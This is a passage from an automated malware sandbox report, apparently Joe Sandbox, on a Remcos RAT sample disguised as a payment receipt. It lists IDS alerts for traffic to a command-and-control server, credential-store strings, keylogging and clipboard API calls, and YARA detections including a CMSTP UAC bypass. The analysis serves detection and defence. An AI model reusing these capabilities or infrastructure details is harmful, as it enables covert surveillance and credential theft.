                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 4x nop then jmp 06F4E183h0_2_06F4D7D4
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 4x nop then jmp 0779D3CBh9_2_0779CA1C

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49706 -> 192.210.150.17:56887
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49984 -> 192.210.150.17:56887
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49985 -> 192.210.150.17:56887
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49987 -> 192.210.150.17:56887
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49986 -> 192.210.150.17:56887
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49988 -> 192.210.150.17:56887
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49983 -> 192.210.150.17:56887
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 192.210.150.17
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49708 -> 178.237.33.50:80
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00426107 recv,12_2_00426107
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055659424.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055659424.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: SwiftCopy_PaymtRecpt121228.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, eaJOpx.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl$
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp~
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2066490817.0000000002631000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2116715944.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4054409156.0000000000B33000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055093570.0000000000D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055093570.0000000000D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055093570.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055659424.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SwiftCopy_PaymtRecpt121228.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: SwiftCopy_PaymtRecpt121228.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_00406E9F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_004072B5
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041BB87 SystemParametersInfoW,12_2_0041BB87

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_023E3E280_2_023E3E28
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_023EE1040_2_023EE104
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_023E6F900_2_023E6F90
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05810BD40_2_05810BD4
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_058101200_2_05810120
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_058101300_2_05810130
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_058120F00_2_058120F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A574480_2_05A57448
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A574580_2_05A57458
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A57A080_2_05A57A08
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF7CAB0_2_06EF7CAB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFF4180_2_06EFF418
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFDDF00_2_06EFDDF0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF65C00_2_06EF65C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF72710_2_06EF7271
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE3E80_2_06EFE3E8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF8B280_2_06EF8B28
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAE080_2_06EFAE08
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAE180_2_06EFAE18
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE7E00_2_06EFE7E0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE7D00_2_06EFE7D0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF77080_2_06EF7708
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFF4080_2_06EFF408
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAC010_2_06EFAC01
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAC100_2_06EFAC10
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFDDE30_2_06EFDDE3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF654D0_2_06EF654D
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF65210_2_06EF6521
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF8AC90_2_06EF8AC9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF5A600_2_06EF5A60
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFB2790_2_06EFB279
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF9A080_2_06EF9A08
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE3D80_2_06EFE3D8
